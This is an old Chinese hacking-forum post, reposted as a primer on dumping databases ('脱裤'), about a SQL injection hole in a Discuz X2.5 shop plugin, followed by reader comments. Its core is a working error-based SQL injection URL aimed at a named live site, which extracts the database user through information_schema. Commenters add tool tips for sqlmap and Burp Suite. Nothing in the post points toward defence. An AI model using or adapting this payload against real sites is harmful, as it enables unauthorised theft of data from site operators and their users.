DZx2.5 插件漏洞sql注入 {科普脱裤}

2013-04-21 09:15:34 42 panda 6934 2

作者：j8g

http://nba2kol.org/plugin.php?id=v63shop:goods&pac=info&gid=110%20or%20@`'`%20and%20[/url](select%20*%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20user()))a%20from%20information_schema.tables%20group%20by%20a)b)%20or%20@`'`

直接看图吧~~

=======================================

漏洞是以前的了，主要是科普脱裤，转载来分享一下，大牛脚下留情~~

类别 Web安全

关于作者

panda42篇文章921篇回复

刺激的内容看这里：www.cnpanda.net

panda

评论42次

要评论？请先登录或注册

42楼

xixi
2013-6-26 15:37

..................科普呢？

回复|@ta|踩(0)|顶(0)
41楼

loversorry
2013-6-25 08:50

burpsuit确实不错，但这方面还是sqlmap强。如果用sqlmap弄这个点，要设prefix和suffix才行。

回复|@ta|踩(0)|顶(0)
40楼

web安全测试
2013-6-20 15:54

求可便宜

回复|@ta|踩(0)|顶(0)
39楼

lusiyu
2013-6-20 13:16

学xi了

回复|@ta|踩(0)|顶(0)
38楼

Wenien
2013-5-17 17:38

这个是burpsuite的教程么！！

回复|@ta|踩(0)|顶(0)
37楼

hualuowusheng
2013-5-13 11:41

科普了也被踩了几下。。

回复|@ta|踩(0)|顶(0)
36楼

1006079161
2013-5-4 14:23

其实用python写个采集脚本也可以，或者用火车头采集我感觉也挺爽的，要是有大牛知道怎么用sqlmap爆这种构造型的注入点，请告知！感谢

回复|@ta|踩(0)|顶(0)
35楼

sfsgfr
2013-5-1 11:23

测试下去，感谢大牛分享

回复|@ta|踩(0)|顶(0)
34楼

weiweiwind
2013-4-24 23:50

漏洞看到过，这个方式脱裤学xi了

回复|@ta|踩(0)|顶(0)
33楼

zouxiangshennan
2013-4-24 19:19

乱码没解决吧

回复|@ta|踩(0)|顶(0)
32楼

zjrlove
2013-4-24 16:28

学xi了哦！！！

回复|@ta|踩(0)|顶(0)
31楼

gonganjia
2013-4-23 21:17

学xi了一个工具一个用法

回复|@ta|踩(0)|顶(0)
30楼

uuwhat
2013-4-23 09:53

导出用记事本打开是木有乱码的

回复|@ta|踩(0)|顶(0)
29楼

小文子
2013-4-23 08:58

字符集不一样重么办

回复|@ta|踩(0)|顶(0)
28楼

牧童
2013-4-23 01:58

正解~~~~~~~

回复|@ta|踩(0)|顶(0)
27楼

ji4nr3n
2013-4-23 01:58

oxsafe论坛的

回复|@ta|踩(0)|顶(0)
26楼

dabizi
2013-4-22 12:53

火车头生成网址太慢了，脱的时候蛮快的

回复|@ta|踩(0)|顶(0)
25楼

wsm123
2013-4-22 12:03

写的真科普

回复|@ta|踩(0)|顶(0)
24楼

jkrow
2013-4-22 11:47

这个应属于burp suite的教程

回复|@ta|踩(0)|顶(0)
23楼

adsltsee
2013-4-22 10:53

实用。。顶一下吧

回复|@ta|踩(0)|顶(0)